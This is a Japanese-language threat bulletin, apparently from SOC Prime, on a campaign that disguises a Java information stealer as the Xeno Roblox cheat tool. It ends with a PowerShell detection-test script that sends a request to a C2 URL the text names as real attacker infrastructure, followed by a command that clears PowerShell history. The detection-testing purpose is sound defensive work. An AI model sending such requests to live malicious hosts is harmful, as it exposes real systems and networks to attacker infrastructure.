SOC Prime Bias:

06 Aug 2026 16:06 UTC

Xeno RobloxチートがJavaベースの情報スティーラーを展開

Author Photo
SOC Prime Team linkedin icon フォローする
Xeno RobloxチートがJavaベースの情報スティーラーを展開
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

マルウェアキャンペーンが人気のあるRobloxスクリプト実行ツールXenoを装い、高度なマルチステージのJavaベースのスティーラーを配布しています。この作戦はDiscordやオンラインフォーラムを通じてゲームコミュニティを狙い、資格情報、暗号通貨ウォレット、および個人情報を盗むことを目的としています。データ窃盗に加えて、ペイロードはリモートアクセスと監視機能をサポートしており、ウェブカメラ制御やライブデスクトップストリーミングを含みます。

調査

Bitdefenderの研究者は、偽のXenoローダー、Windows実行ファイルとして偽装されたJARファイル、そして最終段階のJavaスティーラーを含むマルチステージの感染チェーンを発見しました。この調査では、デバッガと仮想化アーティファクトのチェックなど、高度な抗分析技術が特定されました。研究者はまた、新しい指令統制インフラストラクチャを発見し、マルウェアがCMSTPを介した権限昇格を実行できることを確認しました。

緩和策

ユーザーは、Discordサーバーやゲームフォーラムなどの信頼できないソースから、非公式のゲームチート、スクリプト実行ツール、または関連ツールをダウンロードしないようにするべきです。アプリケーション制御ポリシーと更新されたエンドポイント保護は、許可されていないバイナリや悪意のあるJavaコンポーネントをブロックするのに役立ちます。ゲーム、メッセージング、暗号通貨、金融アカウントにおいて多要素認証(MFA)を有効にすることは、資格情報の盗難に対する重要な保護を追加します。

対応策

悪意のある活動が検出された場合、影響を受けたホストは直ちに隔離され、さらなるデータ流出や横方向移動を阻止する必要があります。調査者は、被害の範囲を特定し、盗まれたブラウザのクッキー、資格情報、暗号通貨ウォレットへのアクセスに焦点を当てるべきです。システムログもまた、許可されていないPowerShellの実行とWindowsレジストリに新しく作成された持続メカニズムについてレビューすべきです。

攻撃フロー

シミュレーション実行

前提条件:テレメトリー&ベースライン事前チェックが合格している必要があります。

理論:このセクションでは、検出ルールをトリガーするように設計された敵の手法(TTP)の正確な実行について詳述します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目指しています。抽象的または無関係な例は誤診につながります。

  • 攻撃の説明とコマンド: 攻撃者は、ゲームチートとして偽装された悪意のあるJavaベースの実行可能ファイルを展開しました。命令を受け取り、盗まれた資格情報を流出させるために、マルウェアはそのC2インフラストラクチャに接続する必要があります。攻撃者は特定のエンドポイント https://solthere.net/justacoolkat10 感染が成功したことを示すためにシグナルを送ります。この”ホームコール”の動作を模擬するためにPowerShellを使用し、プロキシログが検出をトリガーするためにネットワークリクエストを傍受しなければなりません。

  • 回帰テストスクリプト:

    # JavaスティーラーC2通信のシミュレーション
    # ターゲット:特定の悪意のあるURLパターンを通じてSigmaルールをトリガー
    
    $C2_URL = "https://solthere.net/justacoolkat10"
    $UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
    
    Write-Host "[+] $C2_URL に対してシミュレートされたC2通信を開始します。" -ForegroundColor Cyan
    
    try {
        # プロキシ経由でブラウザのようなリクエストをシミュレートするためにInvoke-WebRequestを使用
        $response = Invoke-WebRequest -Uri $C2_URL -UserAgent $UserAgent -Method Get -ErrorAction Stop
        Write-Host "[!] 成功:リクエストが送信されました。SIEMを確認して検出を確認してください。" -ForegroundColor Green
    }
    catch {
        Write-Host "[?] リクエストが失敗しました(ドメインが実際にブロックされている/ダウンしている場合に期待されます)が、テレメトリは生成されるべきです。" -ForegroundColor Yellow
        Write-Host "エラー詳細:$($_.Exception.Message)"
    }
  • クリーンアップのコマンド:

    # このシミュレーションによって作成された永続的なアーティファクトはありません。
    # シミュレートされたコマンドを削除するために単にPowerShell履歴をクリアします。
    Clear-History
    Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green